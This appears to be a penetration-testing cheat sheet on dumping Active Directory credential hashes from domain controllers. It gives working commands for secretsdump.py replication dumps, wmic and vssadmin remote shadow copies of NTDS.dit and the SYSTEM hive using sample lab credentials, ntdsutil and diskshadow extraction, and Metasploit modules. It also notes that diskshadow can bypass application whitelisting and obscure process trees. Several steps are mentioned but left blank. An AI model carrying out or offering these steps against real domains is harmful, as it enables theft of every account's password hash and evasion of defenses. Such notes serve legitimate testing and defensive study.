Dump the domain (Domain Controllers)

Remote Access

Secretsdump.py

secretsdump.py -just-dc-ntlm -user-status -outputfile [out_file] [Domain]/[User]@[IP]

This uses the directory replication interface (DRSUAPI, the same path as DCSync), so the account needs replication rights (Domain Admins, or the DS-Replication-Get-Changes rights) and nothing is written to disk on the DC. -just-dc-ntlm returns NTLM hashes only; use -just-dc to also get Kerberos keys. -user-status appends (status=Enabled) or (status=Disabled) to each line, and the NTDS hashes land in [out_file].ntds.

WMIC & vssadmin (remote shadow copy)

from: https://adsecurity.org/?p=2398

wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1"
copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp

C:\temp must already exist on the DC, and HarddiskVolumeShadowCopy1 is only right if no other shadow copies exist: run "vssadmin list shadows" on the DC (again via wmic) and use the Shadow Copy Volume path it reports. "process call create" returns as soon as the process is spawned, so confirm the files exist before pulling them over C$. Clean up with "vssadmin delete shadows /shadow={ID}" using the ID from the same listing. Both the snapshot creation and the wmic-spawned cmd.exe processes are logged on the DC.

Metasploit

auxiliary/admin/smb/psexec_ntdsgrab
post/windows/gather/credentials/domain_hashdump

Local Access

NTDSutil

ntdsutil, a Windows binary present on every DC, can export ntds.dit through its IFM (Install From Media) function; the export also writes out the SYSTEM and SECURITY hives next to it.

The exported ntds.dit can then be parsed offline with secretsdump.py, which needs the SYSTEM hive from the same export to recover the boot key.

Alternatively, additional information can be included, such as whether each account is active, by passing -user-status to secretsdump.py.

The output can then be filtered to remove both disabled accounts (marked status=Disabled) and machine accounts (names ending in $):

Diskshadow

On Windows Server 2008 and later, the built-in "diskshadow.exe" can be used to take a shadow copy and copy NTDS.dit out of it.

Create an instruction set for diskshadow.exe that creates a new shadow copy of the C: volume and exposes it as drive M:\ (one diskshadow command per line).

Then run:

Side note: because diskshadow.exe is a signed Microsoft binary and its "exec" script command runs an arbitrary program, it can also be used for application whitelisting bypass and process tree obfuscation (the payload appears as a child of diskshadow.exe).

Extracting from NTDS.dit

Secretsdump.py as described above, or any of the following tools
